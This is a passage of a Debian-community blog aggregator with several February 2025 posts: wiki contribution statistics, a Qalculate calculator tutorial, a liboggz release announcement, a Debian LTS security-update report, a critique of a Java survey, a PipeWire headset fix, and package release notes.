  99046 Antoine Beaupré
   6900 Zen Fu
   4784 Jérôme Charaoui
   1446 Gabriel Filion
   1146 Jerome Charaoui
    837 groente
    705 kez
    569 Gaba
    381 Matt Traudt
    237 Stephen Swift

That, of course, is the entire history of the git repo, again. We should take only the last year into account, and probably ignore the tails directory, as sneaky Zen Fu imported the entire docs from another wiki there...

anarcat@angela:help.torproject.org$ find [d-s]* -type f -mtime -365 | xargs -n1 git blame --line-porcelain 2>/dev/null | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
  75037 Antoine Beaupré
   2932 Jérôme Charaoui
   1442 Gabriel Filion
   1400 Zen Fu
    929 Jerome Charaoui
    837 groente
    702 kez
    569 Gaba
    381 Matt Traudt
    237 Stephen Swift

Pretty good! 75k lines. But those are the files that were modified in the last year. If we go a little more nuts, we find that:

anarcat@angela:help.torproject.org$ $ git-count-words-range.py  | sort -k6 -nr | head -10
parsing commits for words changes from command: git log '--since=1 year ago' '--format=%H %al'
anarcat 126116 - 36932 = 89184
zen 31774 - 5749 = 26025
groente 9732 - 607 = 9125
lelutin 10768 - 2578 = 8190
jerome 6236 - 2586 = 3650
gaba 3164 - 491 = 2673
stephen.swift 2443 - 673 = 1770
kez 1034 - 74 = 960
micah 772 - 250 = 522
weasel 410 - 0 = 410

I wrote 126,116 words in that wiki, only in the last year. I also deleted 37k words, so the final total is more like 89k words, but still: that's about forty (40!) articles of the average size (~2k) I wrote in 2022.

(And yes, I did go nuts and write a new log parser, essentially from scratch, to figure out those word diffs. I did get the courage only after asking GPT-4o for an example first, I must admit.)

Let's celebrate that again: I wrote 90 thousand words in that wiki in 2024. According to Wikipedia, a "novella" is 17,500 to 40,000 words, which would mean I wrote about a novella and a novel, in the past year.

But interestingly, if I look at the repository analytics. I certainly didn't write that much more in the past year. So that alone cannot explain the lull in my production here.

Arguments

Another part of me is just tired of the bickering and arguing on the internet. I have at least two articles in there that I suspect is going to get me a lot of push-back (NixOS and Fish). I know how to deal with this: you need to write well, consider the controversy, spell it out, and defuse things before they happen. But that's hard work and, frankly, I don't really care that much about what people think anymore.

I'm not writing here to convince people. I have stop evangelizing a long time ago. Now, I'm more into documenting, and teaching. And, while teaching, there's a two-way interaction: when you give out a speech or workshop, people can ask questions, or respond, and you all learn something. When you document, you quickly get told "where is this? I couldn't find it" or "I don't understand this" or "I tried that and it didn't work" or "wait, really? shouldn't we do X instead", and you learn.

Here, it's static. It's my little soapbox where I scream in the void. The only thing people can do is scream back.

Collaboration

So.

Let's see if we can work together here.

If you don't like something I say, disagree, or find something wrong or to be improved, instead of screaming on social media or ignoring me, try contributing back. This site here is backed by a git repository and I promise to read everything you send there, whether it is an issue or a merge request.

I will, of course, still read comments sent by email or IRC or social media, but please, be kind.

You can also, of course, follow the latest changes on the TPA wiki. If you want to catch up with the last year, some of the "novellas" I wrote include:

(Well, no, you can't actually follow changes on a GitLab wiki. But we have a wiki-replica git repository where you can see the latest commits, and subscribe to the RSS feed.)

See you there!

09 February, 2025 04:19PM

Qalculate hacks

This is going to be a controversial statement because some people are absolute nerds about this, but, I need to say it.

Qalculate is the best calculator that has ever been made.

I am not going to try to convince you of this, I just wanted to put out my bias out there before writing down those notes. I am a total fan.

This page will collect my notes of cool hacks I do with Qalculate. Most examples are copy-pasted from the command-line interface (qalc(1)), but I typically use the graphical interface as it's slightly better at displaying complex formulas. Discoverability is obviously also better for the cornucopia of features this fantastic application ships.

Qalc commandline primer

On Debian, Qalculate's CLI interface can be installed with:

apt install qalc

Then you start it with the qalc command, and end up on a prompt:

anarcat@angela:~$ qalc
> 

Then it's a normal calculator:

anarcat@angela:~$ qalc
> 1+1

  1 + 1 = 2

> 1/7

  1 / 7 ≈ 0.1429

> pi

  pi ≈ 3.142

> 

There's a bunch of variables to control display, approximation, and so on:

> set precision 6
> 1/7

  1 / 7 ≈ 0.142857
> set precision 20
> pi

  pi ≈ 3.1415926535897932385

When I need more, I typically browse around the menus. One big issue I have with Qalculate is there are a lot of menus and features. I had to fiddle quite a bit to figure out that set precision command above. I might add more examples here as I find them.

Bandwidth estimates

I often use the data units to estimate bandwidths. For example, here's what 1 megabit per second is over a month ("about 300 GiB"):

> 1 megabit/s * 30 day to gibibyte 

  (1 megabit/second) × (30 days) ≈ 301.7 GiB

Or, "how long will it take to download X", in this case, 1GiB over a 100 mbps link:

> 1GiB/(100 megabit/s)

  (1 gibibyte) / (100 megabits/second) ≈ 1 min + 25.90 s

Password entropy

To calculate how much entropy (in bits) a given password structure, you count the number of possibilities in each entry (say, [a-z] is 26 possibilities, "one word in a 8k dictionary" is 8000), extract the base-2 logarithm, multiplied by the number of entries.

For example, an alphabetic 14-character password is:

> log2(26*2)*14

  log₂(26 × 2) × 14 ≈ 79.81

... 80 bits of entropy. To get the equivalent in a Diceware password with a 8000 word dictionary, you would need:

> log2(8k)*x = 80

  (log₂(8 × 000) × x) = 80 ≈

  x ≈ 6.170

... about 6 words, which gives you:

> log2(8k)*6

  log₂(8 × 1000) × 6 ≈ 77.79

78 bits of entropy.

Exchange rates

You can convert between currencies!

> 1 EUR to USD

  1 EUR ≈ 1.038 USD

Even fake ones!

> 1 BTC to USD

  1 BTC ≈ 96712 USD

This relies on a database pulled form the internet (typically the central european bank rates, see the source). It will prompt you if it's too old:

It has been 256 days since the exchange rates last were updated.
Do you wish to update the exchange rates now? y

As a reader pointed out, you can set the refresh rate for currencies, as some countries will require way more frequent exchange rates.

The graphical version has a little graphical indicator that, when you mouse over, tells you where the rate comes from.

Other conversions

Here are other neat conversions extracted from my history

> teaspoon to ml

  teaspoon = 5 mL

> tablespoon to ml

  tablespoon = 15 mL

> 1 cup to ml 

  1 cup ≈ 236.6 mL

> 6 L/100km to mpg

  (6 liters) / (100 kilometers) ≈ 39.20 mpg

> 100 kph to mph

  100 kph ≈ 62.14 mph

> (108km - 72km) / 110km/h

  ((108 kilometers) − (72 kilometers)) / (110 kilometers/hour) ≈
  19 min + 38.18 s

Completion time estimates

This is a more involved example I often do.

Background

Say you have started a long running copy job and you don't have the luxury of having a pipe you can insert pv(1) into to get a nice progress bar. For example, rsync or cp -R can have that problem (but not tar!).

(Yes, you can use --info=progress2 in rsync, but that estimate is incremental and therefore inaccurate unless you disable the incremental mode with --no-inc-recursive, but then you pay a huge up-front wait cost while the entire directory gets crawled.)

Extracting a process start time

First step is to gather data. Find the process start time. If you were unfortunate enough to forget to run date --iso-8601=seconds before starting, you can get a similar timestamp with stat(1) on the process tree in /proc with:

$ stat /proc/11232
  File: /proc/11232
  Size: 0               Blocks: 0          IO Block: 1024   directory
Device: 0,21    Inode: 57021       Links: 9
Access: (0555/dr-xr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2025-02-07 15:50:25.287220819 -0500
Modify: 2025-02-07 15:50:25.287220819 -0500
Change: 2025-02-07 15:50:25.287220819 -0500
 Birth: -

So our start time is 2025-02-07 15:50:25, we shave off the nanoseconds there, they're below our precision noise floor.

If you're not dealing with an actual UNIX process, you need to figure out a start time: this can be a SQL query, a network request, whatever, exercise for the reader.

Saving a variable

This is optional, but for the sake of demonstration, let's save this as a variable:

> start="2025-02-07 15:50:25"

  save("2025-02-07T15:50:25"; start; Temporary; ; 1) =
  "2025-02-07T15:50:25"

Estimating data size

Next, estimate your data size. That will vary wildly with the job you're running: this can be anything: number of files, documents being processed, rows to be destroyed in a database, whatever. In this case, rsync tells me how many bytes it has transferred so far:

# rsync -ASHaXx --info=progress2 /srv/ /srv-zfs/
2.968.252.503.968  94%    7,63MB/s    6:04:58  xfr#464440, ir-chk=1000/982266) 

Strip off the weird dots in there, because that will confuse qalculate, which will count this as:

  2.968252503968 bytes ≈ 2.968 B

Or, essentially, three bytes. We actually transferred almost 3TB here:

  2968252503968 bytes ≈ 2.968 TB

So let's use that. If you had the misfortune of making rsync silent, but were lucky enough to transfer entire partitions, you can use df (without -h! we want to be more precise here), in my case:

Filesystem              1K-blocks       Used  Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036  179205040  98% /srv
tank/srv               7667173248 2870444032 4796729216  38% /srv-zfs

(Otherwise, of course, you use du -sh $DIRECTORY.)

Digression over bytes

Those are 1 K bytes which is actually (and rather unfortunately) Ki, or "kibibytes" (1024 bytes), not "kilobytes" (1000 bytes). Ugh.

> 2870444032 KiB

  2870444032 kibibytes ≈ 2.939 TB
> 2870444032 kB

  2870444032 kilobytes ≈ 2.870 TB

At this scale, those details matter quite a bit, we're talking about a 69GB (64GiB) difference here:

> 2870444032 KiB - 2870444032 kB

  (2870444032 kibibytes) − (2870444032 kilobytes) ≈ 68.89 GB

Anyways. Let's take 2968252503968 bytes as our current progress.

Our entire dataset is 7258298064 KiB, as seen above.

Solving a cross-multiplication

We have 3 out of four variables for our equation here, so we can already solve:

> (now-start)/x = (2996538438607 bytes)/(7258298064 KiB) to h

  ((actual − start) / x) = ((2996538438607 bytes) / (7258298064
  kibibytes))

  x ≈ 59.24 h

The entire transfer will take about 60 hours to complete! Note that's not the time left, that is the total time.

To break this down step by step, we could calculate how long it has taken so far:

> now-start

  now − start ≈ 23 h + 53 min + 6.762 s

> now-start to s

  now − start ≈ 85987 s

... and do the cross-multiplication manually, it's basically:

x/(now-start) = (total/current)

so:

x = (total/current) * (now-start)

or, in Qalc:

> ((7258298064  kibibytes) / ( 2996538438607 bytes) ) *  85987 s

  ((7258298064 kibibytes) / (2996538438607 bytes)) × (85987 secondes) ≈
  2 d + 11 h + 14 min + 38.81 s

It's interesting it gives us different units here! Not sure why.

Now and built-in variables

The now here is actually a built-in variable:

> now

  now ≈ "2025-02-08T22:25:25"

There is a bewildering list of such variables, for example:

> uptime

  uptime = 5 d + 6 h + 34 min + 12.11 s

> golden

  golden ≈ 1.618

> exact

  golden = (√(5) + 1) / 2

Computing dates

In any case, yay! We know the transfer is going to take roughly 60 hours total, and we've already spent around 24h of that, so, we have 36h left.

But I did that all in my head, we can ask more of Qalc yet!

Let's make another variable, for that total estimated time:

> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)

  save(((now − start) / x) = ((2996538438607 bytes) / (7258298064
  kibibytes)); total; Temporary; ; 1) ≈
  2 d + 11 h + 14 min + 38.22 s

And we can plug that into another formula with our start time to figure out when we'll be done!

> start+total

  start + total ≈ "2025-02-10T03:28:52"

> start+total-now

  start + total − now ≈ 1 d + 11 h + 34 min + 48.52 s

> start+total-now to h

  start + total − now ≈ 35 h + 34 min + 32.01 s

That transfer has ~1d left, or 35h24m32s, and should complete around 4 in the morning on February 10th.

But that's icing on top. I typically only do the cross-multiplication and calculate the remaining time in my head.

I mostly did the last bit to show Qalculate could compute dates and time differences, as long as you use ISO timestamps. Although it can also convert to and from UNIX timestamps, it cannot parse arbitrary date strings (yet?).

Other functionality

Qalculate can:

  • Plot graphs;
  • Use RPN input;
  • Do all sorts of algebraic, calculus, matrix, statistics, trigonometry functions (and more!);
  • ... and so much more!

I have a hard time finding things it cannot do. When I get there, I typically need to resort to programming code in Python, use a spreadsheet, and others will turn to more complete engines like Maple, Mathematica or R.

But for daily use, Qalculate is just fantastic.

And it's pink! Use it!

Further reading and installation

This is just scratching the surface, the fine manual has more information, including more examples. There is also of course a qalc(1) manual page which also ships an excellent EXAMPLES section.

Qalculate is packaged for over 30 Linux distributions, but also ships packages for Windows and MacOS. There are third-party derivatives as well including a web version and an Android app.

Updates

Colin Watson liked this blog post and was inspired to write his own hacks, similar to what's here, but with extras, check it out!

09 February, 2025 04:09AM

Petter Reinholdtsen

New oggz release 1.1.2 after 15 years

A little over a week ago, I noticed the liboggz package on my Debian dashboard had not had a new upstream release for a while. A closer look showed that its last release, version 1.1.1, happened in 2010. A few patches had accumulated in the Debian package, and I even noticed that I had passed on these patches to upstream five years ago. A handful crash bugs had been reported against the Debian package, and looking at the upstream repository I even found a few crash bugs reported there too. To add insult to injury, I discovered that upstream had accumulated several fixes in the years between 2010 and now, and many of them had not made their way into the Debian package. I decided enough was enough, and that a new upstream release was needed fixing these nasty crash bugs. Luckily I am also a member of the Xiph team, aka upstream, and could actually go to work immediately to fix it.

I started by adding automatic build testing on the Xiph gitlab oggz instance, to get a better idea of the state of affairs with the code base. This exposed a few build problems, which I had to fix. In parallel to this, I sent an email announcing my wish for a new release to every person who had committed to the upstream code base since 2010, and asked for help doing a new release both on email and on the #xiph IRC channel. Sadly only a fraction of their email providers accepted my email. But Ralph Giles in the Xiph team came to the rescue and provided invaluable help to guide be through the release Xiph process. While this was going on, I spent a few days tracking down the crash bugs with good help from valgrind, and came up with patch proposals to get rid of at least these specific crash bugs. The open issues also had to be checked. Several of them proved to be fixed already, but a few I had to creat patches for. I also checked out the Debian, Arch, Fedora, Suse and Gentoo packages to see if there were patches applied in these Linux distributions that should be passed upstream. The end result was ready yesterday. A new liboggz release, version 1.1.2, was tagged, wrapped up and published on the project page. And today, the new release was uploaded into Debian.

You are probably by now curious on what actually changed in the library. I guess the most interesting new feature was support for Opus and VP8. Almost all other changes were stability or documentation fixes. The rest were related to the gitlab continuous integration testing. All in all, this was really a minor update, hence the version bump only from 1.1.1 to to 1.1.2, but it was long overdue and I am very happy that it is out the door.

One change proposed upstream was not included this time, as it extended the API and changed some of the existing library methods, and thus require a major SONAME bump and possibly code changes in every program using the library. As I am not that familiar with the code base, I am unsure if I am the right person to evaluate the change. Perhaps later.

Since the release was tagged, a few minor fixes has been committed upstream already: automatic testing the cross building to Windows, and documentation updates linking to the correct project page. If a important issue is discovered with this release, I guess a new release might happen soon including the minor fixes. If not, perhaps they can wait fifteen years. :)

I would like to send a big thank you to everyone that helped make this release happen, from the people adding fixes upstream over the course of fifteen years, to the ones reporting crash bugs, other bugs and those maintaining the package in various Linux distributions. Thank you very much for your time and interest.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

09 February, 2025 12:15AM

February 08, 2025

Thorsten Alteholz

My Debian Activities in January 2025

Debian LTS

This was my hundred-twenty-seventh month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:

  • [DLA 4014-1] gnuchess security update to fix one CVE related to arbitrary code execution via crafted PGN (Portable Game Notation) data.
  • [DLA 4015-1] rsync update to fix five CVEs related leaking information from the server or writing files outside of the client’s intended destination.
  • [DLA 4015-2] rsync update to fix an upstream regression.
  • [DLA 4039-1] ffmpeg update to fix three CVEs related to possible integer overflows, double-free on errors and out-of-bounds access.

As new CVEs for ffmpeg appeared, I started to work again for an update of this package

Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.

Debian ELTS

This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on:

  • [ELA-1290-1] rsync update to fix five CVEs in Buster, Stretch and Jessie related leaking information from the server or writing files outside of the client’s intended destination.
  • [ELA-1290-2] rsync update to fix an upstream regression.
  • [ELA-1313-1] ffmpeg update to fix six CVEs in Buster related to possible integer overflows, double-free on errors and out-of-bounds access.
  • [ELA-1314-1] ffmpeg update to fix six CVEs in Stretch related to possible integer overflows, double-free on errors and out-of-bounds access.

As new CVEs for ffmpeg appeared, I started to work again for an update of this package

Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.

Debian Printing

This month I uploaded new packages or new upstream or bugfix versions of:

  • brlaser new upstream release (in new upstream repository)

This work is generously funded by Freexian!

Debian Matomo

This month I uploaded new packages or new upstream or bugfix versions of:

This work is generously funded by Freexian!

Debian Astro

This month I uploaded new packages or new upstream or bugfix versions of:

  • calceph sponsored upload of new upstream version
  • libxisf sponsored upload of new upstream version

Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers and maybe the results of his work will already be part of Trixie.

Debian IoT

Unfortunately I didn’t found any time to work on this topic.

Debian Mobcom

This month I uploaded new packages or new upstream or bugfix versions of:

misc

This month I uploaded new upstream or bugfix versions of:

FTP master

This month I accepted 385 and rejected 37 packages. The overall number of packages that got accepted was 402.

08 February, 2025 06:41PM by alteholz

hackergotchi for Erich Schubert

Erich Schubert

Azul’s State-of-Java report is nonsense

Azul’s State-of-Java report is full of nonsense, and no worth looking at.

The report claims various stuff about the adoption of AI in the Java ecosystem.

But its results do not make any sense when looked at in detail.

For example (in the AI section):

  • Figure 21 (“which programming languages to code AI”) has more bars in the chart than labels.
  • Figure 22 (“which Java AI libraries”) clearly is nonsense, because, e.g.:
    • top-ranked “JavaML” is not even on maven, and has not received updates since 2016
    • second-ranked “Deep Java Library (DIL)” would correctly be abbreviated DJL
    • third-ranked “OpenCL” is not a Java library, but a language on its own
    • fourth-ranked is PyTorch. Clearly not Java either
    • fifth-ranked is Jvector. Which is a database
    • seventh-ranked is TensorFlow, again not Java
    • 11th Apache Jena is a RDF app framework, not AI
    • 13th Apache Mahout is dead, and has become a Python Quatum Computing POC, Qunat

I can only guess that people picked some random plausible answer, but were not actually using any of that. Probably because of bad incentives:

Participants were offered token compensation for their participation.

Seems like Dimensional Research, the company who did that survey, screwed up badly.

08 February, 2025 03:50PM by Erich Schubert

February 07, 2025

hackergotchi for Emmanuel Kasper

Emmanuel Kasper

Wireless headset dongle not detected by PulseAudio

For whatever reason, when I plug and unplug my Wireless Headset dongle over USB, it is not always detected by the PulseAudio/Pipewire stack which is running our desktop sound Linux those days. But we can fix that with a restart of the handling daemon, see below.
In PulseAudio terminology an input device (microphone) is called a source, and an output device a sink.

When the headset dongle is plugged in, we can see it on the USB bus:

$ lsusb | grep Headset 
Bus 001 Device 094: ID 046d:0af7 Logitech, Inc. Logitech G PRO X 2 Gaming Headset

The device is detected correctly as a Human Interface Device (HID) device

$ dmesg
...
[310230.507591] input: Logitech Logitech G PRO X 2 Gaming Headset as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.1/1-1.1.4/1-1.1.4:1.3/0003:046D:0AF7.0060/input/input163
[310230.507762] hid-generic 0003:046D:0AF7.0060: input,hiddev2,hidraw11: USB HID v1.10 Device [Logitech Logitech G PRO X 2 Gaming Headset] on usb-0000:00:14.0-1.1.4/input

However it is not seen in the list of sources / sinks of PulseAudio:

$ pactl list short sinks
58      alsa_output.usb-Lenovo_ThinkPad_Thunderbolt_3_Dock_USB_Audio_000000000000-00.analog-stereo      PipeWire        s16le 2ch 48000Hz       IDLE
62      alsa_output.pci-0000_00_1f.3.analog-stereo      PipeWire        s32le 2ch 48000Hz       SUSPENDED
95      bluez_output.F4_4E_FD_D2_97_1F.1        PipeWire        s16le 2ch 48000Hz       IDLE

This unfriendly list shows my docking station, which as a small jack connector for a wired cable, the built in speaker of my laptop, and a blutooth headset.

If I restart Pipewire,

$ systemctl --user restart pipewire

then the headset appears as possible audio output.

$ pactl list short sinks
54      alsa_output.usb-Lenovo_ThinkPad_Thunderbolt_3_Dock_USB_Audio_000000000000-00.analog-stereo      PipeWire        s16le 2ch 48000Hz       SUSPENDED
56      alsa_output.usb-Logitech_Logitech_G_PRO_X_2_Gaming_Headset_0000000000000000-00.analog-stereo    PipeWire        s16le 2ch 48000Hz       SUSPENDED
58      alsa_output.pci-0000_00_1f.3.analog-stereo      PipeWire        s32le 2ch 48000Hz       SUSPENDED
77      bluez_output.F4_4E_FD_D2_97_1F.1        PipeWire        s16le 2ch 48000Hz       SUSPENDED

Once you have set the default input / output device, for me in Gnome, you can check it with:

$ pactl info | egrep '(Sink|Source)'
Default Sink: alsa_output.usb-Logitech_Logitech_G_PRO_X_2_Gaming_Headset_0000000000000000-00.analog-stereo
Default Source: alsa_input.usb-Logitech_Logitech_G_PRO_X_2_Gaming_Headset_0000000000000000-00.mono-fallback

Finally let us play some test sounds:

$ speaker-test --test wav --nloops 1 --channels 2

And test some recording, you will hear the output around one second after the speaking (yes that is recorded audio sent over a Unix pipe for playing !):

# don't do this when the output is a speaker, this will create audio feedback (larsen effect)
$ arecord -f cd - | aplay

07 February, 2025 03:29PM by Manu

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

zigg 0.0.2 on CRAN: Micromaintenance

benchmark chart

The still very new package zigg which arrived on CRAN a week ago just received a micro-update at CRAN. zigg provides the Ziggurat pseudo-random number generator (PRNG) for Normal, Exponential and Uniform draws proposed by Marsaglia and Tsang (JSS, 2000), and extended by Leong et al. (JSS, 2005). This PRNG is lightweight and very fast: on my machine speedups for the Normal, Exponential, and Uniform are on the order of 7.4, 5.2 and 4.7 times faster than the default generators in R as illustrated in the benchmark chart borrowed from the git repo.

As wrote last week in the initial announcement, I had picked up their work in package RcppZiggurat and updated its code for the 64-buit world we now live in. That package alredy provided the Normal generator along with several competing implementations which it compared rigorously and timed them. As one of the generators was based on the GNU GSL via the implementation of Voss, we always ended up with a run-time dependency on the GSL too. No more: this new package is zero-depedency, zero-suggsts and hence very easy to deploy. Moreover, we also include a demonstration of four distinct ways of accessing the compiled code from another R package: pure and straight-up C, similarly pure C++, inclusion of the header in C++ as well as via Rcpp. The other advance is the resurrection of the second generator for the Exponential distribution. And following Burkardt we expose the Uniform too. The main upside of these generators is their excellent speed as can be seen in the comparison the default R generators generated by the example script timings.R:

Needless to say, speed is not everything. This PRNG comes the time of 32-bit computing so the generator period is likely to be shorter than that of newer high-quality generators. If in doubt, forgo speed and stick with the high-quality default generators.

This release essentially just completes the DESCRIPTION file and README.md now that this is a CRAN package. The short NEWS entry follows.

Changes in version 0.0.2 (2025-02-07)

  • Complete DESCRIPTION and README.md following initial CRAN upload

Courtesy of my CRANberries, there is a diffstat report relative to previous release. For more information, see the package page or the git repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

07 February, 2025 02:29PM

Reproducible Builds (diffoscope)

diffoscope 288 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 288. This version includes the following changes:

[ Chris Lamb ]
* Add 'asar' to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS. (Closes: #1095057)
* Update minimal 'black' version.
* Update copyright years.

You find out more by visiting the project homepage.

07 February, 2025 12:00AM